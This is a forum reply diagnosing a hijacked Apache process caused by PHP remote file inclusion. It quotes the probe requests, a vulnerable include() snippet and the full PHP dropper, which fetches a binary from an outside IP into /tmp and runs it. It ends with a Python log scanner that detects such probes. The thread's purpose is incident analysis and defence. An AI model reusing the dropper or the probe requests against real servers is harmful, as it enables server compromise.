Re: Re: apache / exe process taking 99 % cpu
I also googled after the ip address of that remote box to which the
alleged apache proc had a connection and found these links:
http://www.linux.org.ru/view-message.jsp?msgid=632105&back=view-group.jsp%3Fgroup%3D7300
http://www.linux360.ro/forum/archive/o_t/t_4082/proces_care_papa_tot_procesorul_.html
Unfortunately, I don't speak Russian or Romanian either, but I think they
describe the same problems as I have. It seems to be a PHP issue. I
searched through all PHP files that "include" or "fopen" something ...
whew, there are way too many.
I can read Russian and examined the given sources. The problem seems to be in
poorly written PHP scripts. After searching the logs it seems that there is
some kind of robot which traverses sites and, on every script with
parameters, tries to substitute every parameter with a URL:
Standard invocation:
x.x.x.x - - [date] "GET /script.php?product_id=4265&pic=2 HTTP/1.1" 200 32011
Robot tries:
x.x.x.x - - [date] "GET /script.php?product_id=http%3A//217.59.104.226/&pic=http%3A//217.59.104.226/ HTTP/1.0" 200 27948
It tries to exploit similar PHP code (on unvalidated vars from URL):
if(!empty($url_param))
{
    include($url_param . '.inc');
}
else
{
    include('default.inc');
}
When allowed by PHP configuration (allow_url_fopen = on), it downloads
this PHP script (reformatted for better reading):
<?
passthru("killall -9 exe dsadas /tmp/dsadas");
@unlink("/tmp/dsadas");
$fd = fopen("/tmp/dsadas", "w");
if(!$fd) exit;
$xx = fopen('http://142.176.141.5/tmp', 'rb');
while($x=fread($xx, 10240))
fwrite($fd, $x);
fclose($xx);
fclose($fd);
chmod("/tmp/dsadas", 0700);
passthru("/tmp/dsadas;rm -f /tmp/dsadas");
?>
I tried to download the file at 142.176.141.5/tmp (the "exe" file itself), but
it says 404 not found. There are several IP addresses, so maybe someone
will have better luck.
Solution:
1) Disable allow_url_fopen, unless you really need it
2) Check scripts which need enabled allow_url_fopen.
Or you can touch /tmp/dsadas and make it not writable for the apache user
(just kidding ;-)))
Petr Chyba
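As an added example (not code from the thread), here is a small Python scanner that implements the check Petr describes: it reads Apache access log lines and flags requests where any query parameter value decodes to an absolute URL, which is the robot's signature for remote-include probing. The log lines, IP addresses and timestamps below are constructed placeholders modelled on the two requests quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache common log format (placeholder IPs and dates).
# Line 1 is a normal request, lines 2 and 3 carry URL-valued parameters,
# line 4 has no query string at all.
SAMPLE_LOG = """\
10.0.0.1 - - [10/Oct/2005:13:55:36 +0000] "GET /script.php?product_id=4265&pic=2 HTTP/1.1" 200 32011
10.0.0.2 - - [10/Oct/2005:13:55:37 +0000] "GET /script.php?product_id=http%3A//203.0.113.9/&pic=http%3A//203.0.113.9/ HTTP/1.0" 200 27948
10.0.0.3 - - [10/Oct/2005:13:55:38 +0000] "GET /index.php?page=ftp://203.0.113.9/x HTTP/1.0" 200 1024
10.0.0.4 - - [10/Oct/2005:13:55:39 +0000] "GET /static/logo.png HTTP/1.1" 200 4096
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# Any scheme followed by "://" (http, https, ftp, ...) counts as an absolute URL.
URL_SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def suspicious_params(target):
    """Return [(name, value)] for query parameters whose value is an absolute URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; decode again to catch
        # double-encoded values such as http%253A//...
        decoded = unquote(value)
        if URL_SCHEME_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Return one finding per log line that carries a URL-valued parameter.

    A 200 status on such a request is the worrying case: the script answered
    normally, so the include may have fetched and executed the remote file.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        hits = suspicious_params(m.group('target'))
        if hits:
            findings.append({'ip': m.group('ip'), 'status': int(m.group('status')),
                             'path': urlsplit(m.group('target')).path, 'params': hits})
    return findings
```

Run it over the real access_log instead of SAMPLE_LOG, then grep the flagged paths for include()/fopen() calls on request variables; those are the scripts that need fixing before allow_url_fopen is switched back on.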